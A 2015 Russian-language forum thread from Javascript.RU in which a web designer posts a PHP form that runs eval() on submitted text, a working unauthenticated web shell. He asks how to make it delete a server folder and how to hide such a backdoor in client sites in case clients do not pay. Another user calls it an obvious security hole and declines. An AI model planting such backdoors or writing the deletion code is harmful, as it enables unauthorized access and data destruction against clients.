Javascript.RU

Создать новую тему Ответ
 
Опции темы Искать в теме
  #1 (permalink)  
Старый 06.07.2015, 22:57
Аватар для karakym
Профессор
Отправить личное сообщение для karakym Посмотреть профиль Найти все сообщения от karakym
 
Регистрация: 21.02.2010
Сообщений: 213

Выполнение кода PHP в textarea
Доброго времени суток, имеется вот такой вот код:
<?php 
   if ( isset($_POST['text']) ) 
      eval ($_POST['text']); 
?> 
<form method='POST'> 
   <textarea name='text'></textarea> 
   <input type='submit'> 
</form>

Лежит он в файлике на сервера, теперь при запуске этого файла я смогу вводить и выполнять код php!
Вопрос такой какой код мне нужно написать, что бы начиная от корня нашло папку demo и удалило ее со всем содержимым!?
Ответить с цитированием
  #2 (permalink)  
Старый 06.07.2015, 22:59
Аватар для karakym
Профессор
Отправить личное сообщение для karakym Посмотреть профиль Найти все сообщения от karakym
 
Регистрация: 21.02.2010
Сообщений: 213

Для тех кто спросит "А зачем вам это?", такой вот ответ!
Являюсь разработчиком сайтов, было несколько проблем с клиентами.
Работаю по схеме:
1. Предосмотр сайта
2. Аванс
3. Готовый сайт
4. Оплата
Ответить с цитированием
  #3 (permalink)  
Старый 07.07.2015, 03:58
Профессор
Отправить личное сообщение для laimas Посмотреть профиль Найти все сообщения от laimas
 
Регистрация: 14.01.2015
Сообщений: 12,990

Сообщение от karakym
Являюсь разработчиком сайтов
Разработчику сайтов задавать такие нелепые вопросы...
Ответить с цитированием
  #4 (permalink)  
Старый 07.07.2015, 11:50
Аватар для karakym
Профессор
Отправить личное сообщение для karakym Посмотреть профиль Найти все сообщения от karakym
 
Регистрация: 21.02.2010
Сообщений: 213

Сообщение от laimas Посмотреть сообщение
Разработчику сайтов задавать такие нелепые вопросы...
Ну я по WEB-Дизайну (HTML,CSS,jQuery)
Ответить с цитированием
  #5 (permalink)  
Старый 07.07.2015, 12:16
Профессор
Отправить личное сообщение для laimas Посмотреть профиль Найти все сообщения от laimas
 
Регистрация: 14.01.2015
Сообщений: 12,990

Ну это не разработка. Нельзя выполнить код в textarea, это текстовая область, а тем более РНР-код, который выполняется только на сервере. А на сервере нет ни textarea, ни вообще какого либо html, все это строковый тип данных, включая и данные полученные формой.

А чтобы выполнить строку переданную формой как код, нужно чтобы разработчик серверной части разрешил такое действие, чего он вряд ли станет делать, ибо это "явная дыра" в безопасности - стоит не полениться заказчику и проверить такой код, и исполнитель может потерять все.
Ответить с цитированием
  #6 (permalink)  
Старый 07.07.2015, 12:40
Аватар для karakym
Профессор
Отправить личное сообщение для karakym Посмотреть профиль Найти все сообщения от karakym
 
Регистрация: 21.02.2010
Сообщений: 213

Сообщение от laimas Посмотреть сообщение
Ну это не разработка. Нельзя выполнить код в textarea, это текстовая область, а тем более РНР-код, который выполняется только на сервере. А на сервере нет ни textarea, ни вообще какого либо html, все это строковый тип данных, включая и данные полученные формой.

А чтобы выполнить строку переданную формой как код, нужно чтобы разработчик серверной части разрешил такое действие, чего он вряд ли станет делать, ибо это "явная дыра" в безопасности - стоит не полениться заказчику и проверить такой код, и исполнитель может потерять все.
Предложите вариант который обезопасит меня от кидал
Ответить с цитированием
  #7 (permalink)  
Старый 07.07.2015, 12:45
Профессор
Отправить личное сообщение для laimas Посмотреть профиль Найти все сообщения от laimas
 
Регистрация: 14.01.2015
Сообщений: 12,990

Без сервера вам, как дизайнеру, нет доступных способов.

Размещайте выполненный заказ, то есть шаблон дизайна, в сети, пусть заказчик оценивает, и после оплаты отдавать его заказчику.

Последний раз редактировалось laimas, 07.07.2015 в 12:48.
Ответить с цитированием
  #8 (permalink)  
Старый 07.07.2015, 14:02
Аватар для karakym
Профессор
Отправить личное сообщение для karakym Посмотреть профиль Найти все сообщения от karakym
 
Регистрация: 21.02.2010
Сообщений: 213

То есть, нет никакого способа, внедрить в свой код, запасной вход!?
Ответить с цитированием
  #9 (permalink)  
Старый 07.07.2015, 14:13
Профессор
Отправить личное сообщение для laimas Посмотреть профиль Найти все сообщения от laimas
 
Регистрация: 14.01.2015
Сообщений: 12,990

Свой, это какой?
Ответить с цитированием
  #10 (permalink)  
Старый 07.07.2015, 18:24
Аватар для karakym
Профессор
Отправить личное сообщение для karakym Посмотреть профиль Найти все сообщения от karakym
 
Регистрация: 21.02.2010
Сообщений: 213

Сообщение от laimas Посмотреть сообщение
Свой, это какой?
Ну вообще в проект сайта!
Ответить с цитированием
Ответ



Опции темы Искать в теме
Искать в теме:

Расширенный поиск


Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Дождаться завершения функции и продолжить выполнение кода XRASER Events/DOM/Window 4 10.04.2014 16:39
Выполнение php кода в javascritp'e zalza Events/DOM/Window 15 25.11.2012 21:27
Ошибка при вставке php кода в js код zevilz Общие вопросы Javascript 6 10.10.2012 19:21
Пошаговое выполнение кода KamalovRadik jQuery 2 28.10.2011 20:46
Последовательное выполнение кода avtor01 AJAX и COMET 6 29.10.2008 19:06